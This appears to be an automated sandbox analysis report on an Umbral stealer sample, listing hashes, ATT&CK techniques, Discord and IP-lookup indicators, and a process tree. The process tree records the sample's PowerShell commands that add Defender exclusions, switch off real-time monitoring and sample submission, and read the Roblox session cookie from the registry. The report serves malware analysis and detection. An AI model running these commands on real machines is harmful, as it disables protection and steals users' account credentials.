umbral | 0697ab58f1b4c94620982f20ffc2e1069974a7f4c38c804e3a15a3d3f54a89d5

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
30-06-2024 09:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dllmain.exe
Size

229KB
MD5

411156b1cc6ca8a2722edb9a9bf15991
SHA1

93441490e31783317bb8b3c2e4a9d0916eb4674d
SHA256

0697ab58f1b4c94620982f20ffc2e1069974a7f4c38c804e3a15a3d3f54a89d5
SHA512

61609bbcf4b09a5feb0ba72b531687f73bb3ee1e12dd7bda6ab2a4b5caf33f39e91df7f200184b63039cd7eee2b6b95575a89f5f03850d4841861ca3f4e377b5
SSDEEP

6144:tloZMNrIkd8g+EtXHkv/iD4vW2mmkrHMl9YW3X241b8e1mik4i:voZmL+EP8vW2mmkrHMl9YW3X2MXkB

Score

10^/10

umbral execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

Processes:

resource yara_rule

behavioral2/memory/2072-0-0x00000236C00B0000-0x00000236C00F0000-memory.dmp family_umbral
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

232 powershell.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

24 discord.com
29 discord.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

17 ip-api.com
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exe

pid process

2576 wmic.exe

resource	yara_rule
behavioral2/memory/2072-0-0x00000236C00B0000-0x00000236C00F0000-memory.dmp	family_umbral

flow	ioc
24	discord.com
29	discord.com

flow	ioc
17	ip-api.com

pid	process
2576	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133642121645539076"	chrome.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exechrome.exechrome.exe

pid	process
232	powershell.exe
232	powershell.exe
3272	powershell.exe
3272	powershell.exe
1304	powershell.exe
1304	powershell.exe
4348	powershell.exe
4348	powershell.exe
4336	powershell.exe
4336	powershell.exe
1756	chrome.exe
1756	chrome.exe
1468	chrome.exe
1468	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

chrome.exe

pid process

1756 chrome.exe
1756 chrome.exe
1756 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

dllmain.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	2072	dllmain.exe
Token: SeDebugPrivilege	232	powershell.exe
Token: SeDebugPrivilege	3272	powershell.exe
Token: SeDebugPrivilege	1304	powershell.exe
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeIncreaseQuotaPrivilege	1712	wmic.exe
Token: SeSecurityPrivilege	1712	wmic.exe
Token: SeTakeOwnershipPrivilege	1712	wmic.exe
Token: SeLoadDriverPrivilege	1712	wmic.exe
Token: SeSystemProfilePrivilege	1712	wmic.exe
Token: SeSystemtimePrivilege	1712	wmic.exe
Token: SeProfSingleProcessPrivilege	1712	wmic.exe
Token: SeIncBasePriorityPrivilege	1712	wmic.exe
Token: SeCreatePagefilePrivilege	1712	wmic.exe
Token: SeBackupPrivilege	1712	wmic.exe
Token: SeRestorePrivilege	1712	wmic.exe
Token: SeShutdownPrivilege	1712	wmic.exe
Token: SeDebugPrivilege	1712	wmic.exe
Token: SeSystemEnvironmentPrivilege	1712	wmic.exe
Token: SeRemoteShutdownPrivilege	1712	wmic.exe
Token: SeUndockPrivilege	1712	wmic.exe
Token: SeManageVolumePrivilege	1712	wmic.exe
Token: 33	1712	wmic.exe
Token: 34	1712	wmic.exe
Token: 35	1712	wmic.exe
Token: 36	1712	wmic.exe
Token: SeIncreaseQuotaPrivilege	1712	wmic.exe
Token: SeSecurityPrivilege	1712	wmic.exe
Token: SeTakeOwnershipPrivilege	1712	wmic.exe
Token: SeLoadDriverPrivilege	1712	wmic.exe
Token: SeSystemProfilePrivilege	1712	wmic.exe
Token: SeSystemtimePrivilege	1712	wmic.exe
Token: SeProfSingleProcessPrivilege	1712	wmic.exe
Token: SeIncBasePriorityPrivilege	1712	wmic.exe
Token: SeCreatePagefilePrivilege	1712	wmic.exe
Token: SeBackupPrivilege	1712	wmic.exe
Token: SeRestorePrivilege	1712	wmic.exe
Token: SeShutdownPrivilege	1712	wmic.exe
Token: SeDebugPrivilege	1712	wmic.exe
Token: SeSystemEnvironmentPrivilege	1712	wmic.exe
Token: SeRemoteShutdownPrivilege	1712	wmic.exe
Token: SeUndockPrivilege	1712	wmic.exe
Token: SeManageVolumePrivilege	1712	wmic.exe
Token: 33	1712	wmic.exe
Token: 34	1712	wmic.exe
Token: 35	1712	wmic.exe
Token: 36	1712	wmic.exe
Token: SeIncreaseQuotaPrivilege	4476	wmic.exe
Token: SeSecurityPrivilege	4476	wmic.exe
Token: SeTakeOwnershipPrivilege	4476	wmic.exe
Token: SeLoadDriverPrivilege	4476	wmic.exe
Token: SeSystemProfilePrivilege	4476	wmic.exe
Token: SeSystemtimePrivilege	4476	wmic.exe
Token: SeProfSingleProcessPrivilege	4476	wmic.exe
Token: SeIncBasePriorityPrivilege	4476	wmic.exe
Token: SeCreatePagefilePrivilege	4476	wmic.exe
Token: SeBackupPrivilege	4476	wmic.exe
Token: SeRestorePrivilege	4476	wmic.exe
Token: SeShutdownPrivilege	4476	wmic.exe
Token: SeDebugPrivilege	4476	wmic.exe
Token: SeSystemEnvironmentPrivilege	4476	wmic.exe
Token: SeRemoteShutdownPrivilege	4476	wmic.exe
Token: SeUndockPrivilege	4476	wmic.exe
Token: SeManageVolumePrivilege	4476	wmic.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

chrome.exe

pid	process
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe
1756	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dllmain.exechrome.exe

description	pid	process	target process
PID 2072 wrote to memory of 232	2072	dllmain.exe	powershell.exe
PID 2072 wrote to memory of 232	2072	dllmain.exe	powershell.exe
PID 2072 wrote to memory of 3272	2072	dllmain.exe	powershell.exe
PID 2072 wrote to memory of 3272	2072	dllmain.exe	powershell.exe
PID 2072 wrote to memory of 1304	2072	dllmain.exe	powershell.exe
PID 2072 wrote to memory of 1304	2072	dllmain.exe	powershell.exe
PID 2072 wrote to memory of 4348	2072	dllmain.exe	powershell.exe
PID 2072 wrote to memory of 4348	2072	dllmain.exe	powershell.exe
PID 2072 wrote to memory of 1712	2072	dllmain.exe	wmic.exe
PID 2072 wrote to memory of 1712	2072	dllmain.exe	wmic.exe
PID 2072 wrote to memory of 4476	2072	dllmain.exe	wmic.exe
PID 2072 wrote to memory of 4476	2072	dllmain.exe	wmic.exe
PID 2072 wrote to memory of 3092	2072	dllmain.exe	wmic.exe
PID 2072 wrote to memory of 3092	2072	dllmain.exe	wmic.exe
PID 2072 wrote to memory of 4336	2072	dllmain.exe	powershell.exe
PID 2072 wrote to memory of 4336	2072	dllmain.exe	powershell.exe
PID 2072 wrote to memory of 2576	2072	dllmain.exe	wmic.exe
PID 2072 wrote to memory of 2576	2072	dllmain.exe	wmic.exe
PID 1756 wrote to memory of 1920	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 1920	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 2984	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 3136	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 3136	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 4716	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 4716	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 4716	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 4716	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 4716	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 4716	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 4716	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 4716	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 4716	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 4716	1756	chrome.exe	chrome.exe
PID 1756 wrote to memory of 4716	1756	chrome.exe	chrome.exe

C:\Users\Admin\AppData\Local\Temp\dllmain.exe
"C:\Users\Admin\AppData\Local\Temp\dllmain.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dllmain.exe'
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4348

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4476

C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
2⤵
PID:3092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4336

C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
2⤵
- Detects videocard installed
PID:2576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee482ab58,0x7ffee482ab68,0x7ffee482ab78
2⤵
PID:1920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 --field-trial-handle=1688,i,3664021712908138446,14965164705388144045,131072 /prefetch:2
2⤵
PID:2984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1688,i,3664021712908138446,14965164705388144045,131072 /prefetch:8
2⤵
PID:3136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2264 --field-trial-handle=1688,i,3664021712908138446,14965164705388144045,131072 /prefetch:8
2⤵
PID:4716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3100 --field-trial-handle=1688,i,3664021712908138446,14965164705388144045,131072 /prefetch:1
2⤵
PID:2324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3136 --field-trial-handle=1688,i,3664021712908138446,14965164705388144045,131072 /prefetch:1
2⤵
PID:3216

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4392 --field-trial-handle=1688,i,3664021712908138446,14965164705388144045,131072 /prefetch:1
2⤵
PID:508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4564 --field-trial-handle=1688,i,3664021712908138446,14965164705388144045,131072 /prefetch:8
2⤵
PID:2992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4672 --field-trial-handle=1688,i,3664021712908138446,14965164705388144045,131072 /prefetch:8
2⤵
PID:4576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4724 --field-trial-handle=1688,i,3664021712908138446,14965164705388144045,131072 /prefetch:8
2⤵
PID:1228

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4952 --field-trial-handle=1688,i,3664021712908138446,14965164705388144045,131072 /prefetch:8
2⤵
PID:3220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4936 --field-trial-handle=1688,i,3664021712908138446,14965164705388144045,131072 /prefetch:8
2⤵
PID:4724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1688,i,3664021712908138446,14965164705388144045,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1468

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4300

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
1KB

MD5
2521eb3973c5f6b2aec4ff26290feb62

SHA1
af3e347128bd411a276b0859ca2879947623f7cb

SHA256
ba7eadadbd69c195b3c94b6c2e848325797cf0d45a05b7385b95f6f704420874

SHA512
b9321bac5fee2db2ea475b6b8ff1b0ec63d6400e2b663679f8b34f2b7d9efb3822810512dd62707da38133fb5a4e413e49db9680db76403019fb9266d032d179

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
356B

MD5
ec01a7ef342b86928270827d986728d8

SHA1
d294e7220425740bf50c778aed4ab077489ead0c

SHA256
68f302fcd5a70f12f3b97e6df4003bac3a02495b4c37dfdaf25ff81cddafde61

SHA512
6a12d6a4cfe1cbdc7e9c948968f54ca27539c3a9c48b50377b35e3100449ebb1c4f3fe16cd76f6ecf91c96f4778ff29016e0a8d7fb4e8b61aca9fde7b3da8181

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\d89d668a-04b0-4743-82e3-22c7fa07affa.tmp
Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
a172def4063a59d11cc666c156f78040

SHA1
f2bd71d9ff27a1ae2833b0b464120bb07657eea2

SHA256
4f0f81fba92b2bcd811e5ad112c653c0a2eb5557a85b3ebbec5d80c0ecab1cf5

SHA512
3d60467913a0242fcf19e5f0f0115488e026e3d4dc18a157b25f3a15a8d5ebb5c690b356489abb956929207e03bb9e91a7767e4568aefdc99d15b13a41662b24

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
16KB

MD5
3d4f42f4976df90914e1e850574c0ad0

SHA1
68ed54508d01d304abcdd7a64c59d2cf1d195a0c

SHA256
5892e59a9cce000f77b116e07a572d2660b2e02f8e497be4f6cb99f2d58bab3d

SHA512
159b8b3e212a34d6cdb46fad746f6bc14c83d4503c9e6eca4d19ab40a0ea0f6cf9ac64724f5838eca2ad515d8a9990167dfe1048c7a70c1657576191b0853aa2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
281KB

MD5
de6613f4a1090b9b1c2a0dbc6e9556c4

SHA1
e3455bf3a22ac52a79bcc0a5feab97655ec21941

SHA256
169c12c27027af231895fb9a3e31b2d503ec94f52539821cbeeb412b617da8cc

SHA512
2ac589480b2e3224feba13d1396e749e5ff96ed60901d36597b305b1b144cc54bc5fa9d196fc8dba00e01a74a9c095191f1db90188e3c8ee441a1885be8c70f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B

MD5
966914e2e771de7a4a57a95b6ecfa8a9

SHA1
7a32282fd51dd032967ed4d9a40cc57e265aeff2

SHA256
98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

SHA512
dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
88db0a141f2cd066a7c4df2b3c8f8010

SHA1
94fa00eb79992a0ded28012645a7caf8e04debe1

SHA256
0d8418bfcb5ad8ee710af1bfbed2e2a095e50d56f487372775e6cef420f1c85a

SHA512
0cc6090bf52227b8241e9f38849257de7e5c2ad2a9a9ead41f115b7492caa97c64bf2cd02640d48dc5d8593c4ae462497fe1aba87f8454a096cd174932a699bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o0cdtopt.kt4.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
\??\pipe\crashpad_1756_PJNMOGUOYGUARZPN
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/232-15-0x00007FFEE3D80000-0x00007FFEE4841000-memory.dmp

Filesize
10.8MB

Download
memory/232-18-0x00007FFEE3D80000-0x00007FFEE4841000-memory.dmp

Filesize
10.8MB

Download
memory/232-12-0x000001F324F40000-0x000001F324F62000-memory.dmp

Filesize
136KB

Download
memory/232-13-0x00007FFEE3D80000-0x00007FFEE4841000-memory.dmp

Filesize
10.8MB

Download
memory/232-14-0x00007FFEE3D80000-0x00007FFEE4841000-memory.dmp

Filesize
10.8MB

Download
memory/2072-71-0x00000236DA7A0000-0x00000236DA7AA000-memory.dmp

Filesize
40KB

Download
memory/2072-32-0x00000236DA870000-0x00000236DA8C0000-memory.dmp

Filesize
320KB

Download
memory/2072-0-0x00000236C00B0000-0x00000236C00F0000-memory.dmp

Filesize
256KB

Download
memory/2072-72-0x00000236DA7D0000-0x00000236DA7E2000-memory.dmp

Filesize
72KB

Download
memory/2072-33-0x00000236DA770000-0x00000236DA78E000-memory.dmp

Filesize
120KB

Download
memory/2072-92-0x00007FFEE3D80000-0x00007FFEE4841000-memory.dmp

Filesize
10.8MB

Download
memory/2072-31-0x00000236DA7F0000-0x00000236DA866000-memory.dmp

Filesize
472KB

Download
memory/2072-2-0x00007FFEE3D80000-0x00007FFEE4841000-memory.dmp

Filesize
10.8MB

Download
memory/2072-1-0x00007FFEE3D83000-0x00007FFEE3D85000-memory.dmp

Filesize
8KB

Download
memory/4348-68-0x000001E87BB40000-0x000001E87BB88000-memory.dmp

Filesize
288KB

Download